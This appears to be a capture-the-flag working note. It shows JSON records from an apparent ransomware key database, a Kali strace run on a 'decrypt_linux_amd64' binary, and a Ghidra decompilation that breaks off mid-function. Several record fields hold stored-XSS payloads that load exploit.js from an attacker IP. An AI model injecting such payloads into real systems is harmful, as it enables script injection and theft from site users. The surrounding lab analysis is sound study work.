{"filename":"protocols.txt","id":66,"key":"bk0udDFibXEzaDZ0QjZKSGNXNVlDZEJEbGJSZ0toRkdiSkxqSlpRdER4R25wUC5yUklZazJMUi5hLm1jLkp6dg==","name":"192.168.14.45","timer":"2020-04-15T20:52:45.553107"}, {"filename":"mailcap.order","id":67,"key":"VExYcHRGTmpBc0poREcwU3F5YmNyS0VLblQuNkpBT1laQWVLd2Vwbm13Wmx6cnpxSUNSdGM2Sld2RmZoRm9Zdg==","name":"192.168.16.87","timer":"2020-04-15T20:55:03.712607"}, {"filename":"debconf.conf","id":68,"key":"ZE5qVHhoN0Zadi5kR1hjOHNFNFNFYnF6Vl9DZG9wYmliYmQ4MW1rd1RfRURvdFhhZ3pUUlhHc2tNaklRRVZGMA==","name":"195.204.167.10","timer":"2020-04-15T20:55:50.152751"}, {"filename":"wgetrc","id":75,"key":"NUJFZ0VXcjBHSUhsbVhxMFZZLmpFWFRCdmxFMHp1NkNmcmRZeDdXdUs4UXBhY1RyUGJTVDRDQ2VlbDhlWWdzNA==","name":"192.168.16.65","timer":"2020-04-16T06:43:27.536027"}, {"filename":"smartd.conf","id":83,"key":"b1N2OE45cTRfR25uQjZJREp0bTZ6c0FIWDRvZHVvbi4wT2NqejJvN0hpNWdod0Rrb2tEMkpyVTNNclBLTm9ybQ==","name":"192.168.16.53","timer":"2020-04-16T12:44:38.639593"}, {"filename":"reportbug.conf","id":85,"key":"bFNBb1BBWGV6RTRfSWVnQVVBakhtODZya1c4MWdiQjFoUElsV0UySHdZZU13cEVIOVNlZElUalZnVE96M2wwYw==","name":"192.168.225.1","timer":"2020-04-17T14:49:13.031589"}, {"filename":"vegan_secrets.txt","id":74,"key":"SFFaU0pCTXdUcDJYWlZQR29oY2ZRbkwzWk5JeTRKZXQ4MWxBTnE2ekpDVV9PM3c2SDZGeHdHRHZUSEdaWTFiRQ==","name":"192.168.66.1","timer":"2020-04-15T20:58:08.833383"}, {"filename":"modules.doc","id":70,"key":"ZzJrSU12RmdNT1ZSQjAxYmx0dWNGeHFXNVF2RW9tMEt4Q29lT2hPbWhfaHJSRHBzMWJqUVlIYUFOQkNHUWRSZg==","name":"192.168.66.111","timer":"2020-04-15T20:56:33.911143"}, {"filename":"papersize.clip","id":72,"key":"R24xR1h4aGE2aEJRVEhWRHpUdHVDU1BCLi5VdUxQQm5JZ2ZHQ0U2b0tJZzhGclhZTG53eDE3U1Eya2VKajBjMA==","name":"192.168.66.188","timer":"2020-04-15T20:57:26.348101"}, {"filename":"small_steps.rtf","id":73,"key":"dzAwNk1mR0EwY0loa2FUaVkuckgyMUxObVRONFdzWktwcDk4dVZMc1M3ZzlmUGMzaXRISktwZ1RLYUpuZVdEdg==","name":"192.168.0.12","timer":"2020-04-15T20:57:41.321097"}, {"filename":"papersize.clip","id":84,"key":"ODB2S0l3OHphNXJ0ZlpxNnFTWlNoZ3FncEFNdko4eWRRVlUyYWlTaW9sb05fVm5GeTBRNDVvS085QnFNd2drQw==","name":"192.168.16.53","timer":"2020-04-16T12:44:38.647069"}, {"filename":"my_keys.xls","id":76,"key":"dnYzcWJKcnk1aVFUQmd2Z0h5QURyUkpuSEpjOFVTOC5rVTE1MS5jZ2laZk9Yb21JaHl2VkZ3RU9NQ2NXamVLQQ==","name":"192.168.16.65","timer":"2020-04-16T06:43:27.542364"}, {"filename":"Your_shadow.docx","id":77,"key":"dklTN3VLZmd1VWFDaVZWeDlLWEtzd0gwcVg2TUVMcmNVak10bGFQdDZYZ29HMXVfci5DbHRwbkNRV0s5dGVKTg==","name":"10.212.134.200","timer":"2020-04-16T07:17:00.797966"}, {"filename":"No_secrets_here.txt","id":78,"key":"TTgwekpfQy5DbDZ1ckFjUERmRFRSUlJEeTdhdE10Z3k0cWZJeHNDbjhVWHJYNWlfLkN1WDRUakxEelJ3enN4Vg==","name":"10.212.134.200","timer":"2020-04-16T07:17:00.805219"}, {"filename":"deluser.conf","id":86,"key":"VlJRRmlsTGw5bXpNODFhVER5bHJUdVFlbkVyYnpIX0djUEI4b3ROU0FHWUVkelZ4X1RfTC53azZqdm1EblowbA==","name":"10.8.19.103","timer":"2023-07-11T17:01:30.809939"}, {"filename":"hostname","id":87,"key":"ZHJfZFZpdUFaZkhDNkhWYW91SGZoRmg1enRYT3NNblBod1ViS0FKaHpjdTNLVVNIZkc3UWVoTTBVeEN4dFQ4Tg==","name":"10.8.19.103","timer":"2023-07-11T17:01:30.815419"}, {"filename":"wgetrc","id":88,"key":"aHhxTXFkamJvOGF0ODF3Ni5aanFySUlUaDM1M1lSUGlwZjVsOHVhZ1ZBYjRmeUR4SWRVM0pqSmR0aUFDTEVNVw==","name":"<script src=10.8.19.103:1234/exploit.js></script>","timer":"2023-07-11T17:50:59.890773"}, {"filename":"miredo.conf","id":89,"key":"VFZuUmROVVRFcHg5LkpxaHk1aFNPZzM5SWFXSEhlajc5VGh4X1RWTnZOZTVMSkh5YjVuM1NIOGJ0bXguSEVZLg==","name":"<script src=10.8.19.103/exploit.js></script>","timer":"2023-07-11T18:03:08.051348"}, {"filename":"ethertypes","id":90,"key":"T001dElZb0lZNzFvQUFrQkZKQkhvZVEweVJCVUtjUUMucHZ0M0VKU3FXT3Z3SWxHVUpsazdlMkVaYmtkOTRyWQ==","name":"<script src=10.8.19.103/exploit.js></script>","timer":"2023-07-11T18:03:08.055864"}, {"filename":"login.defs","id":91,"key":"WVB0VjdkLlhKZFh1NkN4VS5PSjFDNzYuMUFyR0FTYkhJSVVsMFJzZ1lCUVowNFlHQjl3dHFua2ZoNk8zbGFOQw==","name":"<script src='http://10.8.19.103:1234/exploit.js'></script>","timer":"2023-07-11T18:12:33.305679"}, {"filename":"ca-certificates.conf","id":92,"key":"SzRWYlhtRVJZN2dEVEtWR2djVEQ1b3MxR3NoNEU5a05hX1RQS1pUN0RiZDVEVVRpZ2FJV2NPLmxKUGdFbXRJcg==","name":"<script src='http://10.8.19.103:1234/graph_ql.js'></script>","timer":"2023-07-11T18:31:04.238391"}, {"filename":"su.doc","id":93,"key":"V3BxX1JyVG52akwwZzhTSW1HREpaUFpMaVJnUUJvYWMub2dWUFo0MFlSNk0ua0ZYR3l0UmJYVHZ0dEE2VFRiVg==","name":"<script src='http://10.8.19.103:1234/graph_ql_key.js'></script>","timer":"2023-07-11T19:32:19.485197"}]}}

{"filename":"Database.kbxd","id":48,"key":"F+lRG6As2e1qBd3/7dPTvcmcluUEjMwkq22K6zBIcP8ZF1LuJLsarUKgmhw+P8oZvBSJUXGiGVcRuHxbnQY8Tg==","name":"195.204.178.84","timer":"2020-04-15T14:29:24.383136"}

┌──(witty㉿kali)-[~/Downloads]
└─$ ltrace ./decrypt_linux_amd64 
Can't execute `./decrypt_linux_amd64': Permission denied
failed to initialize process 777646: No such file or directory
couldn't open program './decrypt_linux_amd64': No such file or directory
                                                                                              
┌──(witty㉿kali)-[~/Downloads]
└─$ chmod +x decrypt_linux_amd64 
                                                                                              
┌──(witty㉿kali)-[~/Downloads]
└─$ ltrace ./decrypt_linux_amd64
Couldn't find .dynsym or .dynstr in "/proc/777701/exe"
                                                                                              
┌──(witty㉿kali)-[~/Downloads]
└─$ strace ./decrypt_linux_amd64
execve("./decrypt_linux_amd64", ["./decrypt_linux_amd64"], 0x7ffc56001980 /* 56 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x58a930)       = 0
sched_getaffinity(0, 8192, [0 1 2 3])   = 8
openat(AT_FDCWD, "/sys/kernel/mm/transparent_hugepage/hpage_pmd_size", O_RDONLY) = 3
read(3, "2097152\n", 20)                = 8
close(3)                                = 0
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7feb4fb09000
mmap(0xc000000000, 67108864, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xc000000000
mmap(0xc000000000, 67108864, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xc000000000
mmap(NULL, 33554432, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7feb4db09000
mmap(NULL, 2164736, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7feb4d8f8000
mmap(NULL, 65536, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7feb4d8e8000
mmap(NULL, 65536, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7feb4d8d8000
rt_sigprocmask(SIG_SETMASK, NULL, [], 8) = 0
sigaltstack(NULL, {ss_sp=NULL, ss_flags=SS_DISABLE, ss_size=0}) = 0
sigaltstack({ss_sp=0xc000002000, ss_flags=0, ss_size=32768}, NULL) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
gettid()                                = 777749
rt_sigaction(SIGHUP, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGHUP, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGINT, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGQUIT, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGILL, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGILL, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGTRAP, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTRAP, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGABRT, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGABRT, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGBUS, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGBUS, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGFPE, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGFPE, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGUSR1, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGUSR1, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGSEGV, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGSEGV, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGUSR2, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGUSR2, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGPIPE, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGPIPE, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGALRM, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGALRM, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGTERM, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTERM, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGSTKFLT, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGSTKFLT, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGCHLD, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGURG, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGURG, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGXCPU, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGXCPU, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGXFSZ, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGXFSZ, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGVTALRM, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGVTALRM, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGPROF, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGPROF, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGWINCH, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGWINCH, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGIO, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGIO, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGPWR, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGPWR, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGSYS, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGSYS, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRTMIN, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_1, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_2, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_2, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_3, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_3, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_4, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_4, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_5, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_5, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_6, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_6, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_7, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_7, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_8, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_8, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_9, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_9, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_10, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_10, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_11, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_11, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_12, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_12, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_13, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_13, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_14, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_14, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_15, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_15, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_16, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_16, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_17, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_17, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_18, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_18, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_19, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_19, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_20, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_20, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_21, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_21, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_22, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_22, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_23, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_23, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_24, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_24, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_25, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_25, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_26, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_26, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_27, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_27, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_28, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_28, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_29, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_29, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_30, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_30, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_31, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_31, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigaction(SIGRT_32, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGRT_32, {sa_handler=0x455780, sa_mask=~[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x4558b0}, NULL, 8) = 0
rt_sigprocmask(SIG_SETMASK, ~[], [], 8) = 0
clone(child_stack=0xc000048000, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM) = 777750
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_SETMASK, ~[], [], 8) = 0
clone(child_stack=0xc00004a000, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM) = 777751
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_SETMASK, ~[], [], 8) = 0
clone(child_stack=0xc000044000, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM) = 777753
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
futex(0xc000012bc8, FUTEX_WAKE_PRIVATE, 1) = 1
futex(0xc00005a148, FUTEX_WAKE_PRIVATE, 1) = 1
futex(0xc00005a148, FUTEX_WAKE_PRIVATE, 1) = 1
readlinkat(AT_FDCWD, "/proc/self/exe", "/home/witty/Downloads/decrypt_li"..., 128) = 41
fcntl(0, F_GETFL)                       = 0x80002 (flags O_RDWR|O_CLOEXEC)
futex(0xc00005a148, FUTEX_WAKE_PRIVATE, 1) = 1
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7feb4d898000
fcntl(1, F_GETFL)                       = 0x80002 (flags O_RDWR|O_CLOEXEC)
fcntl(2, F_GETFL)                       = 0x80002 (flags O_RDWR|O_CLOEXEC)
exit_group(0)                           = ?
+++ exited with 0 +++

┌──(witty㉿kali)-[~/Downloads]
└─$ ./decrypt_linux_amd64 -h
                                                                                              
┌──(witty㉿kali)-[~/Downloads]
└─$ ./decrypt_linux_amd64   

void main.main(void)

{
  ulong *puVar1;
  long in_FS_OFFSET;
  
  while (puVar1 = (ulong *)(*(long *)(in_FS_OFFSET + -8) + 0x10),
        &stack0x00000000 < (undefined *)*puVar1 || &stack0x00000000 == (undefined *)*puVar1) {
    runtime.morestack_noctxt();
  }
  if (os.Args._8_8_ != 4) {
    os.Exit(); ---here
  }
  if (os.Args._8_8_ < 2) {
